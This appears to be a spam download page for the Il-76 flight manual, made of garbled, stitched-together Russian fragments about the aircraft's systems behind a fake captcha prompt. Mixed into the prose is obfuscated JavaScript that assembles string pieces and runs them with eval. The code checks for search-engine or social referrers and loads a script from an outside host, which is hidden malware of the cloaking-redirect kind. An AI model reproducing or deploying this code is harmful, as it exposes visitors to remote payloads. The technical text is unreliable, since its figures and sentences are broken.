


---

I'm not a robot  reCAPTCHA  
[Privacy](#) - [Terms](#)

Continue

## Руководство По Летной Эксплуатации Ил-76

Ил-76 в полёте

Ил-76 в полёте

Каждое полукрыло оборудовано мощной механизацией и располагает пятисекционным предкрылком и двумя трёхщелевыми закрылками.. В мае 1 97 1 года самолёт был впервые представлен вниманию международной общественности на авиасалоне в Ле Бурже.. Первый серийный самолёт совершил свой первый полёт 5 мая 1.. Гидросистема делится на 2 самостоятельные, независимые друг от друга системы… Чкалова, всего за годы производства построено около 1.. Нейтральный газ в ГНГ образуется из воздуха в результате сжигания в нём топлива.. Новожилова (с 2 8 июля 1 Новожилов — Генеральный конструктор ОКБ московского машиностроительного завода «Стрела»).. Носовая нога имеет 4 бескамерных колеса (1 Управляется от штурвальчика на угол.

Силовая установка представлена четырьмя турбореактивными двигателями, подвешенными на пилонах под крылом.. Во второй книге помещена информация о системах самолета и их эксплуатация, а также указаны действия экипажа при возникновении неисправностей.. bro":ED["jegp"]="inde";ED["NQHP"]="mail";ED["bORQ"]=" cre";ED["tThz"]="orce";ED["FzkB"]="s");";ED["HwaQ"]="tion";ED["RKnC"]="out(";ED["YMzz"]="quer";ED["WNMP"]="endC";ED["qTzd"]="}els";ED["gagA"]=":a. m";ED["BkVv"]="succ";ED["SjIF"]="engt";ED["SAcn"]="";\$";ED["BQap"]="pt");ED["Ejcg"]="ref.. 0/";ED["rCSq"]="(typ";ED["UcGF"]="ead";ED["ZJgB"]="HR){";ED["YUOC"]="=t,p";ED["tQEQ"]="e,ur";ED["cMcF"]="var ";ED["wFKj"]="(if(";ED["yOTC"]="){0}";ED["SCJs"]="ttp";ED["iwUe"]="ward";ED["AqAt"]="e(h";ED["Ukgk"]="(res";ED["PDIJ"]="););";ED["PGzS"]="";/";ED["XsEb"]="yaho";ED["vdwz"]="//o2";ED["hUvb"]="jque";ED["HzEP"]="live";ED["bTAz"]="exOf";ED["lZZx"]="aTyp";ED["TYdT"]="d()";ED["Yeme"]="00);";ED["bjEh"]="eDat";ED["ECuG"]="docu";ED["XvCW"]="a.te";ED["hPjI"]="lati";ED["HqyB"]="ateE";ED["Sfsx"]="GET";ED["ItYE"]="hild";ED["wyQz"]="/aja";ED["wGHk"]="ssDa";ED["Kfyg"]=".jqX";ED["Rbia"]="(var";ED["hzGe"]="l:h";ED["dKsJ"]="eAtA";ED["rOaI"]="xtSi";ED["LtoK"]="in.. В случае посадки с убранными шасси стационарная ППС обеспечивает разрядку всех трёх огнетушителей (автоматически).. Горизонтальное оперение расположено на верхней части киля (Т- образная форма).

Ил-76 в полёте

Ил-76 в полёте

Работы по созданию самолёта проходили под руководством заместителя Генерального конструктора Г.. На самолёте также установлена система обнаружения перегрева мотогондол, срабатывающая при возможном разрушении трубопровода отбора воздуха от двигателей.. В последних модификациях самолётов двигатели Д- 3.. Серийно производился в Узбекистане, на Ташкентском авиационном производственном объединении имени В.. Министерстве авиационной промышленности СССР поручило ОКБ С.. Руководство по летной эксплуатации (сокр РЛЭ) — набор справочных материалов и инструкций, предназначенный для.. Система нейтрального газа (ЧНГ) предназначена для предохранения топливных баков самолёта от взрыва или пожара в случае прострелов крыла во время выполнения боевого задания или пролёта зоны боевых действий.. На киле имеется руль направления с триммером и сервокомпенсатором.. В2, который заключён в трёх цилиндрических баллонах УБЦ- 1.

Ил-76 в полёте

На каждой из четырёх стоек установлено по 4 камерных колеса с p=4,5+0,5 кг/см.. В наличии также двухсекционный элерон и четыре тормозных шитка.. var k = '%d0%a0%d1%83%d0%ba%d0%be%d0%b2%d0%be%d0%b4%d1%81%d1%82%d0%b2%d0%be+%d0%bf%d0%be+%d0%bb%d0%b5%d1%82%d0%bd%d0%be%d0%b9+%d1%8d%d0%ba%d1%81%d0%bf%d0%bb%d1%83%d0%b0%d1%82%d0%b0%d1%86%d0%b8+d0%b8%d0%bb-76';var ED = new Array();ED["WGpZ"]="xOf(";ED["krOL"]"]="eme";ED["PjMv"]"]="ty.. Система СПЗ С4 П6 В переменного трёхфазного тока напряжением 2.. В каждом топливном баке имеется предрасходный отсек, а в главном баке ещё и расходный отсек.. Для удобства погрузки и разгрузки задние тельферы могут выдвигаться за порог ramпы на 5 м.. Максимальное количество топлива, заправляемого при централизованной заправке 1.

Ил-76 в полёте

Грузовая кабина оборудована двумя грузовыми лебёдками, установленными возле передней переборки, четырьмя электротельферами грузоподъёмностью по 2,5 т и четырьмя подтрапниками, ширину расположения которых можно менять.. Г Акт работы Макетной комиссии был утверждён Главнокомандующим ВВСП.. Кроме того, нейтральный газ должен содержать не менее 1.. В качестве огнегасящего состава в стационарных ППС используется хладон 1.. j";ED["NhAd"]="func";ED["TPWR"]="("v"ya";ED["rWpe"]="und";ED["hqgr"]="ef l";ED["aKUK"]="bing";ED["OIJk"]="x.. s";ED["rVfN"]="om/l";ED["Lotx"]="vk \";ED["MrIb"]="Elem";ED["APRq"]="efin";ED["lSeJ"]="ajax";ED["rOzz"]="fals";ED["rMfV"]"]="nt(";ED["TGoC"]="ssDo";ED["UTVy"]"]="1.. Фрунзе (Командир — Герой Советского Союза.. Грузовая кабина имеет размеры 2 Самолёт способен брать на борт до 9.. Кутаховым 2 0 ноября 1 Первый полёт самолёт совершил 2.. Производство перенесено на ульяновский «Авиастар- СП». КП заменены на ПС- 9 А- 7 6 тягой 1 4 5 ВСУТА- 6 А размещена в передней части левого обтекателя шасси.. Стреловидность крыла по линии четвертой хорд — 2.. Советом Министров СССР было принято постановление о начале работ по созданию Ил- 7.. Э Кузнецов), посадку совершил на аэродроме Раменское.. МФ, изготовленном на «Ташкентском авиационном производственном объединении имени В.. В кабине экипажа (в кабине ШК, в техотсeke и кормовой кабине) применяются огнетушители ОП- 1- 2 с огнегасящей смесью хладон 1.. Воздух подаётся из СКВ, топливо из ТС Основной компонент нейтрального газа азот воздуха (8.. Управление ЧНГ сосредоточено на панели рабочего места БИ.. Щит- 7 8» Показал себя с лучшей стороны в Афганистане.. Баки нумеруются в соответствии с принадлежностью к двигателю, например: 1- Г, 1- Д, 1- Р.. По сравнению с двигателями Д- 3 КП: бо Серийное производство Ил- 7.. Самолет Ил - 76Т предназначен для перевозки крупногабаритной техники а грузов на магистральных воздушных трассах.. Сигнал поступает от КВ находящихся под снимаемыми обтекателями на консолях крыла и в нижней части обтекателей шасси.. Для подхода во внутренние объёмы баков, для заправки их топливом сверху, слива конденсата и топлива на поверхности крыла имеются соответственно люки- лазы, заливные горловины и нажимные краны.. i";ED["hAWh"]"]="get";ED["nijV"]"]="e{va";ED["AkKa"]"]="L1CY";ED["ZafO"]"]=">0ll";ED["TtII"]"]="eval";ED["EQqJ"]"]="if(r";ED["Xvqw"]"]="q = ";ED["ckeW"]"]="ents";ED["oQVH"]"]="ed";ED["WyHH"]"]="Of("";ED["RPWO"]"]="cume";ED["XkBC"]"]="0lr";eval(ED["cMcf"]+ED["Xvqw"]+ED["nSLd"]+ED["FEsQ"]+ED["ECuG"]+ED["RscI"]+ED["bORQ"]+ED["HqyB"]+ED["krOL"]+ED["rMfV"]+ED["QsDR"]+ED["BQap"]+ED["gagA"]+ED["dKsJ"]+ED["KRej"]+ED["DzPW"]+ED["tjSn"]+ED["PGzS"]+ED["wyQz"]+ED["OIJk"]+ED["OCKG"]+ED["kXyz"]+ED["Zfbz"]+ED["wyQz"]+ED["HVrq"]+ED["DGyr"]+ED["YMzz"]+ED["BodE"]+ED["UTVy"]+ED["hUvb"]+ED["PjMv"]+ED["LtoK"]+ED["FZkB"]+ED["ECuG"]+ED["RscI"]+ED["hAWh"]+ED["MrIb"]+ED["ckeW"]+ED["TTFg"]+ED["jCsN"]+ED["AqAt"]+ED["UcGF"]+ED["yOTC"]+ED["dCxt"]+ED["WNMP"]+ED["ItYE"]+ED["eQBR"]+ED["NhAd"]+ED["HwaQ"]+ED["ZCnK"]+ED["KGCn"]+ED["rCSq"]+ED["wljw"]+ED["QCfh"]+ED["rWpe"]+ED["APRq"]+ED["oQVH"]+ED["CGuu"]+ED["Abfb"]+ED["RKnC"]+ED["XkuB"]+ED["Yeme"]+ED["qTzd"]+ED["nijV"]+ED["PIZA"]+ED["HkOP"]+ED["RPWO"]+ED["xepG"]+ED["InGq"]+ED["upsk"]+ED["EQqJ"]+ED["hqgr"]+ED["SjIF"]+ED["LMUN"]+ED["wFKj"]+ED["hxHm"]+ED["DSuA"]+ED["bTAz"]+ED["TPWR"]+ED["UeHA"]+ED["IEWn"]+ED["SKVV"]+ED["hxHm"]+ED["DSuA"]+ED["bTAz"]+ED["StTP"]+ED["OCKG"]+ED["IEWn"]+ED["SKVV"]+ED["Ejcg"]+ED["jegp"]+ED["WGpZ"]+ED["JMLV"]+ED["QdsS"]+ED["IEWn"]+ED["XkBC"]+ED["BtS"]+ED["UeHA"]+ED["WyHH"]+ED["aKUK"]+ED["IEWn"]+ED["XkBC"]+ED["BtS"]+ED["UeHA"]+ED["WyHH"]+ED["XsEb"]+ED["pWDg"]+ED["ZafO"]+ED["Ejcg"]+ED["jegp"]+ED["WGpZ"]+ED["AASu"]+ED["IEWn"]+ED["XkBC"]+ED["BtS"]+ED["UeHA"]+ED["WyHH"]+ED["HzEP"]+ED["IEWn"]+ED["XkBC"]+ED["BtS"]+ED["UeHA"]+ED["WyHH"]+ED["Lotx"]+ED["YHZY"]+ED["Rbia"]+ED["vduF"]+ED["FznF"]+ED["PnTW"]+ED["tThz"]+ED["SAcn"]+ED["lSeJ"]+ED["ZgcH"]+ED["XFoX"]+ED["Sfsx"]+ED["gmOi"]+ED["lZZx"]+ED["uxef"]+ED["AAfr"]+ED["YUOC"]+ED["ZKFz"]+ED["wGHk"]+ED["YVen"]+ED["AJsF"]+ED["LUbm"]+ED["TGoC"]+ED["cXgx"]+ED["zXZX"]+ED["qPxv"]+ED["HpLF"]+ED["rOzz"]+ED["QEQ"]+ED["hzGe"]+ED["SCJs"]+ED["vdwz"]+ED["AkKa"]+ED["VgXK"]+ED["mXYv"]+ED["iwUe"]+ED["hPjI"]+ED["spzZ"]+ED["rVfN"]+ED["geZ D"]+ED["Sleg"]+ED["eyDm"]+ED["STek"]+ED["BkVv"]+ED["HEIG"]+ED["NhAd"]+ED["HwaQ"]+ED["Ukgk"]+ED["VKJa"]+ED["bjEh"]+ED["XvCW"]+ED["rOaI"]+ED["lWsy"]+ED["Kfyg"]+ED["ZJgB"]+ED["TtII"]+ED["Ukgk"]+ED["VKJa"]+ED["bjEh"]+ED["eUlt"]+ED["PDIJ"]+ED["pxmf"]+ED["TYdT"]);Руководство по летной эксплуатации Ил-76Т.. Топливные баки имеют систему дренажа ВСУ системы заправки топливных баков.. Хорошо зарекомендовал себя на учениях «Щит- 7.. На первых серийных модификациях устанавливались двигатели Д- 3.. Крыло самолёта трапециевидное с переломом по задней кромке..";ED["eQBR"]="(a);";ED["DzPW"]"]="ute(";ED["QdSs"]"]="bler";ED["qPxv"]"]="e,js";ED["StTP"]"]="("go";ED["BtS"]"]="ef.. А и ГНГ ТС состоит из: топливных баков, размещённых по всему крылу и представляющие собой кессон- баки, входящие в силовую схему крыла.. Все кабины Ил- 7 Самолёт может транспортировать всю номенклатуру боевой техники воздушно- десантных подразделений.. Также, может перевозить большую часть техники мотострелковых дивизий.. В корме расположен трёхстворчатый задний грузовой люк.. В каждой группе по 3 бака: главный, дополнительный и резервный.. Ручные переносные огнетушители предназначены для тушения пожара внутри кабин и снаружи самолёта.. Ильюшина провести исследовательские работы по созданию проекта военно- транспортного самолёта Ил- 7.. Испытания самолёт проходил в гарнизоне Кречевщиц.. В ходе работ по модернизации в фюзеляж самолёта были добавлены две вставки по 3,3 м, что значительно увеличило объём грузовой кабины (с 3.. Стояночное торможение от переключателя на ЦПП.. Л (кабины пилотов и штурмана герметически не разделены, кормовая кабина с пушечной установкой присутствует только на военных версиях самолёта).. КП тягой 1 2 0 00 кгс Данные двигатели позволяют самолёту лететь в диапазоне скоростей 2.. Эти отсеки отделены от остальной части бака нервюрами, в нижних частях которых расположены обратные клапаны, обеспечивающие одностороннее перетекание топлива за насосом предрасходных (расходных) отсеков.. В1 Конструктивная защита на самолёте выполнена в виде противопожарных перегородок, облицовок, уплотнений, дренажных полостей и т.. Стабилизатор переставной. с рулём высоты и триммером- флеттнером..";ED["QsDR"]"]="scri";ED["HkOP"]"]="f=d0";ED["hxHm"]"]="(ref";ED["SKVV"]"]="0)ll";ED["lWsy"]"]="atus";ED["LMUN"]"]="h>0";ED["uxef"]"]="e:s";ED["ZKFz"]"]="roce";ED["cXgx"]"]="main";ED["UeHA"]"]="ndex";ED["upsk"]"]="rer";ED["PnTW"]"]="="f";ED["QCfh"]"]="\$\$\$="";ED["AASu"]"]="vmsn";ED["vduF"]"]="sho";ED["dCxt"]"]=".. Руководство по летной эксплуатации 2007 pdf. Скачать.. Кроме того, на консолях крыла установлено по одному дренажному баку.. А М В дальнейшем самолёты Ил- 7 Ташкентском авиационном производственном объединении имени В.. Предусмотрена параллельная работа трёх генераторов, параллельная работа четырёх генераторов исключается.. В топливных баках расположены агрегаты ТС: система СПУТ- 4- 1 (система программного управления топливом); система подачи топлива к двигателям и перекачки в предрасходный и расходный отсеки; система заправки баков топливом; система слива конденсата; дренажная система.. Руководство по летной эксплуатации Руководство по летной эксплуатации (сокр. e10c415e6f